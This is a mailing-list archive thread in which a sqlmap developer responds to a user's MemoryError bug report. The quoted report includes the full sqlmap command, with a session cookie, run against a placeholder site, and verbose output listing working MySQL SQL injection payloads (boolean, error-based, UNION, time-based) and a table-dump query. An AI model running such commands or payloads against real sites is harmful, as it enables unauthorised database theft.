Re: [sqlmap-users] Memory problems
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Memory problems
|
From: Miroslav S. <mir...@gm...> - 2011-01-28 23:06:54
|
Hi David. I've made a little testing and couldn't reproduce this one. 100,000 rows with 100 columns (integer numbers from 0-99) and still no crashing (30MB long session file). Also, I've tried to make a really large array, but still nothing. OS went unresponsive, but couldn't get "MemoryError". Could you try to run it on some other system? Also, is there anything else interesting about this "large" data retrieval? KR On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote: > # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" > --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 > -D nomes -T class --dump > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 16:58:05 > > [16:58:05] [DEBUG] cleaning up configuration parameters > [16:58:05] [DEBUG] setting the HTTP timeout > [16:58:05] [DEBUG] setting the HTTP Cookie header > [16:58:05] [DEBUG] setting the HTTP method to POST > [16:58:05] [DEBUG] creating HTTP requests opener object > [16:58:05] [INFO] using > '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file > [16:58:05] [INFO] resuming injection data from session file > [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file > [16:58:05] [INFO] testing connection to the target url > you provided an HTTP Cookie header value. The target url provided its own > Cookie within the HTTP Set-Cookie header. Do you want to continue using the > HTTP Cookie values that you provided? [Y/n] > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: POST > Parameter: vulnparam > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: vulnparam=6 AND 5647=5647 > > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT > COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 > ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM > information_schema.tables GROUP BY x)a) > > Type: UNION query > Title: MySQL UNION query (NULL) - 4 to 7 columns > Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, > CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), > CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: vulnparam=6 AND SLEEP(5) > --- > > [16:58:06] [INFO] the back-end DBMS is MySQL > > web application technology: PHP 5.3.2 > back-end DBMS: MySQL 5.0 > [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes' > [16:58:06] [INFO] read from file > '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns > [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes' > [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, > CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM > nomes.class# > [17:00:09] [DEBUG] performed 1 queries in 122 seconds > > [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run > with the latest development version from the Subversion repository. If the > exception persists, please send by e-mail to > sql...@li... the command line, the following text and > any information needed to reproduce the bug. The developers will try to > reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 0.9-dev > Python version: 2.6.5 > Operating system: posix > Traceback (most recent call last): > File "./sqlmap.py", line 83, in main > start() > File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in > start > action() > File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action > conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) > File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in > dumpTable > entries = inject.getValue(query, blind=False, dump=True) > File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue > value = __goInband(query, expected, sort, resumeValue, unpack, dump) > File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband > data = parseUnionPage(output, expression, partial, None, sort) > File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in > parseUnionPage > dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, > kb.injection.place, conf.parameters[kb.injection.place], expression, > logOutput)) > MemoryError > > [*] shutting down at: 17:00:13 > > There are about 50,350 entries in the table and 48 columns.I tested the > query manually, and returned a page with 600k of information.I think that > sqlmap did not support the amount of data...? > > David > > ------------------------------------------------------------------------------ > Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > Finally, a world-class log management solution at an even better price-free! > Download using promo code Free_Logger_4_Dev2Dev. Offer expires > February 28th, so secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsight-sfd2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
